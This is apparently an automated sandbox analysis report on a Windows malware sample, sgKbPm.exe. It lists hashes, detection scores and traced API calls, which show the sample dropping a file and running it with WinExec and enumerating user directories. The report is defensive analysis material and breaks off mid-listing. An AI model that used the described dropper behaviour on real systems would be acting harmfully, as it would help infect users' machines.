Commandline:	C:\Users\user\AppData\Local\Temp\sgKbPm.exe
Imagebase:	0xc50000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:25:01
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1468
Imagebase:	0x680000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	74

Executed Functions

Function 00414044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00414223
WriteFile.KERNELBASE(00000000,FFFEE3A2,00003E00,?,00000000), ref: 00414252
CloseHandle.KERNELBASE(00000000), ref: 00414256
WinExec.KERNEL32(?,00000005), ref: 00414262

Strings

dleA, xrefs: 004140D0
Kern, xrefs: 004140F4
sgKbPm.exe, xrefs: 004141FD, 00414200
GetT, xrefs: 00414188
lstr, xrefs: 004141A7
catA, xrefs: 004141AF
athA, xrefs: 00414199
GetM, xrefs: 004140B6
Clos, xrefs: 00414129
Writ, xrefs: 00414148
odul, xrefs: 0041422D
.dll, xrefs: 00414102
WinE, xrefs: 00414110
el32, xrefs: 004140FB
Crea, xrefs: 00414169

Memory Dump Source

Source File: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: File$CloseCreateExecHandleWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$sgKbPm.exe
API String ID: 3741012433-895174202
Opcode ID: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
Instruction ID: 0fad939afa1a3e6eef74dcea6ddb39993472a9db8089d9d8a1791b0fffe143ca
Opcode Fuzzy Hash: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
Instruction Fuzzy Hash: 1C611978D00215ABCF24CF94D848AEEBBB0BB94315F2582ABD505A7741C7789EC1CB99

Function 004014E0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 0040150B
__open.LIBCMT ref: 0040157A
_fprintf.LIBCMT ref: 0040159C
__read.LIBCMT ref: 004015CC
__close.LIBCMT ref: 004015D9
_strncmp.LIBCMT ref: 00401617
_calloc.LIBCMT ref: 004016A9
__execv.LIBCMT ref: 0040173B
_fprintf.LIBCMT ref: 00401752

Strings

Cannot open %s, xrefs: 0040158E
Cannot find Python executable %s, xrefs: 00401687
-script.pyw, xrefs: 00401558
Could not exec %s, xrefs: 00401744
#!python.exe, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: _fprintf$FileModuleName__close__execv__open__read_calloc_strncmp
String ID: #!python.exe$-script.pyw$Cannot find Python executable %s$Cannot open %s$Could not exec %s
API String ID: 2502740745-3972628896
Opcode ID: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
Instruction ID: 796e4f919e2f8e9c448ad3e98618f95884ab6d66caa4008a2a0434ec9930ee7c
Opcode Fuzzy Hash: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
Instruction Fuzzy Hash: A07136719043419BD320EF65D885B9B73E8AFD8304F14493EF489A73E1E639E9448B9B

Function 004021B8 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 004021C0

Part of subcall function 0040218D: GetModuleHandleW.KERNEL32(mscoree.dll,?,004021C5,?,?,00406AFB,000000FF,0000001E,?,0040399D,?,00000001,?,?,00403E83,00000018), ref: 00402197
Part of subcall function 0040218D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004021A7

ExitProcess.KERNEL32 ref: 004021C9

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
Instruction ID: 4f065410a833747b2fa51117dbabb5f5d23e2195355c7fa658f3e8009557e2db
Opcode Fuzzy Hash: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
Instruction Fuzzy Hash: F4B09B31000158BBDB012F23DD4DC4D7F55DB403917104035F914190B1DFB1AD5299D4

Function 004064D7 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004064EC

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
Instruction ID: fc63dde57cecbdf2c2aaf7bb1ec022fcb12f636a59951f49be284e9b9c4476cd
Opcode Fuzzy Hash: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
Instruction Fuzzy Hash: A9D05E72A903455AEB145F75BE08B623BDCD784795F00843AB80DC6190E5B4D5609948

Function 004023D4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 004023E0

Part of subcall function 004022A8: __lock.LIBCMT ref: 004022B6
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 004022ED
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402302
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040232C
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402342
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040234F
Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040237E
Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040238E

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 56d6ec75f9ca001e469de65b509690461a690c23f8048b21a9ddfe31d5bb7ce0
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D5B0927258020833EA202582AC07F063B1987C0B64E240066BA0C295E1A9A6A961808A

Non-executed Functions

Function 00401EE2 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00404454
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404469
UnhandledExceptionFilter.KERNEL32(0040E2D4), ref: 00404474
GetCurrentProcess.KERNEL32(C0000409), ref: 00404490
TerminateProcess.KERNEL32(00000000), ref: 00404497

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
Instruction ID: a2c1d01f0a8fc7b860fa4c5ba8dee9755c81e3f17099ada6bc54c17834eb60e6
Opcode Fuzzy Hash: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
Instruction Fuzzy Hash: 3E21FEB4401210EFD740DF65FA856893BB4FB48300F1184BAEA08E76B0E3F859A48F1D

Function 00406000 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005FBE), ref: 00406005

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
Instruction ID: 276ab158461ab0854dff8c4ba172e82da5abdd5be2fa13cd776f410961e88b47
Opcode Fuzzy Hash: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
Instruction Fuzzy Hash: 7890026125252196D60027715E0968776D49A5960676109716212E4094DABC8054991A

Function 00417B71 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: 7b357e6e517895dbe12adbe9a7f777a7b357507db5a8af5602780b1ce824b875
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: 79819531608B458FC714DF29D8906EAB7E2EFD6314F14892ED0EA87751D738A889CB49

Function 004010A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsplitpath.LIBCMT ref: 004010FA
__wsplitpath.LIBCMT ref: 00401133
__wmakepath.LIBCMT ref: 00401186
_calloc.LIBCMT ref: 00401192
_strncpy.LIBCMT ref: 004011A7
_calloc.LIBCMT ref: 004011B8
_strncpy.LIBCMT ref: 004011C6

Strings

\, xrefs: 0040110D
\, xrefs: 0040114B

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: __wsplitpath_calloc_strncpy$__wmakepath
String ID: \$\
API String ID: 550690-164819647
Opcode ID: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
Instruction ID: ff4e68a8fe18fc9b97d4bba43c3c323c9ca1ce8c53413bd27601e723a30b8d8d
Opcode Fuzzy Hash: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
Instruction Fuzzy Hash: 9F316CB1404380AED325DB10CC81FEBB3E8AF89704F04496EF7C567191E378994887AB

Function 00401350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60processsynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401375
SetConsoleCtrlHandler.KERNEL32 ref: 0040138C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,00000001), ref: 004013AF
_fprintf.LIBCMT ref: 004013C7
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 004013E6
GetExitCodeProcess.KERNEL32(00000001,00000000), ref: 004013F5

Strings

D, xrefs: 00401384
failed to create process., xrefs: 004013B9
failed to get exit code from process., xrefs: 004013FF

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: Process$CodeConsoleCreateCtrlExitHandlerObjectSingleWait_fprintf_memset
String ID: D$failed to create process.$failed to get exit code from process.
API String ID: 1493708761-2047806753
Opcode ID: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
Instruction ID: 34a530c21fcf4aab6bb134418fb42986268233c3b95e978881f8daa222adcb36
Opcode Fuzzy Hash: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
Instruction Fuzzy Hash: D31191B0648301AFE310EF65CD46F1B77E8AB84B04F108D2DF659E62D0E6B8D5188B5A

Function 004046C5 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004046D1

Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E

__amsg_exit.LIBCMT ref: 004046F1
__lock.LIBCMT ref: 00404701
InterlockedDecrement.KERNEL32(?), ref: 0040471E
InterlockedIncrement.KERNEL32(00711670), ref: 00404749

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
Instruction ID: 762af939121588747dd0ca135b41566db6ae5fc7b386992e2f1cba590a1bc26f
Opcode Fuzzy Hash: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
Instruction Fuzzy Hash: EE01EDB1901621ABC720AF2698067AE7664BB41755F04813BEA60772D0CB3C6D01CFDD

Function 00403ABD Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00403ADB

Part of subcall function 00403EF9: __mtinitlocknum.LIBCMT ref: 00403F0F
Part of subcall function 00403EF9: __amsg_exit.LIBCMT ref: 00403F1B
Part of subcall function 00403EF9: EnterCriticalSection.KERNEL32(?,?,?,004019E7,?), ref: 00403F23

___sbh_find_block.LIBCMT ref: 00403AE6
___sbh_free_block.LIBCMT ref: 00403AF5
HeapFree.KERNEL32(00000000,?,0040F578,0000000C,0040515F,00000000,?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C), ref: 00403B25
GetLastError.KERNEL32(?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C,00403F14,?,?,?,004019E7,?), ref: 00403B36

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
Instruction ID: 0fc8657c13906ab74fcdd902c6ebe0ed0f7107b6a60225d746b313d4028bb8d5
Opcode Fuzzy Hash: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
Instruction Fuzzy Hash: 64015EB1941305AADA306FA2980AB5B7E689B0072AF10853FF104B61C2CA7C9A408A5C

Function 00401410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 00401469
_sprintf.LIBCMT ref: 00401477
_sprintf.LIBCMT ref: 004014A9

Strings

%s, xrefs: 004014A3

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: _sprintf$_calloc
String ID: %s
API String ID: 1847391153-3874713491
Opcode ID: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
Instruction ID: 3e0aaedb16861467738b36e15ffebac14c8137eedcf37fbcf32618918a6528ec
Opcode Fuzzy Hash: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
Instruction Fuzzy Hash: B72138312042025FC311CF1CC494EE6B3E69F86348F15456AF885EB2B2DA76E90E87D5

Function 0040A2E4 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A318
__isleadbyte_l.LIBCMT ref: 0040A34C
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A37D
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A3EB

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
Instruction ID: ecb9902cf17e40a010e2e2b1b54a430317f3bb45ddcf6aa4964fa5cd43223a8d
Opcode Fuzzy Hash: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
Instruction Fuzzy Hash: C531D031A00346EFDB20DF64C8949AE3BA5FF01310B1589BAE861AB2D1D734DD60DB5A

Function 00404E31 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00404E3D

Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E

__getptd.LIBCMT ref: 00404E54
__amsg_exit.LIBCMT ref: 00404E62
__lock.LIBCMT ref: 00404E72

Memory Dump Source

Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
Instruction ID: 09d2f9d651c6c409bc02885c121a8a6903a39f7021fc6d6957eb733fdf563978
Opcode Fuzzy Hash: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
Instruction Fuzzy Hash: ADF062B69407008AD630BB75D80674F76907F40725F15823FF6407B2D2CB7C5901CA99

Analysis Process: sgKbPm.exePID: 7164, Parent PID: 6580COMMON

Execution Graph

Execution Coverage:	28.9%
Dynamic/Decrypted Code Coverage:	8.9%
Signature Coverage:	19.2%
Total number of Nodes:	292
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00C529E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C52A02
wsprintfA.USER32 ref: 00C52A1A
memset.MSVCRT ref: 00C52A44
lstrlen.KERNEL32(?), ref: 00C52A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00C52A6C
strrchr.MSVCRT ref: 00C52A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00C52A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00C52AAE
memset.MSVCRT ref: 00C52AC6
memset.MSVCRT ref: 00C52ADA
FindFirstFileA.KERNEL32(?,?), ref: 00C52AEF
memset.MSVCRT ref: 00C52B13
lstrcmpiA.KERNEL32(?,?), ref: 00C52B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00C52B67
FindClose.KERNEL32(00000000), ref: 00C52B6E

Strings

Documents and Settings, xrefs: 00C52A8D, 00C52A92, 00C52A9A, 00C52AAD
C:\, xrefs: 00C52A2F
%s*, xrefs: 00C52A14

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
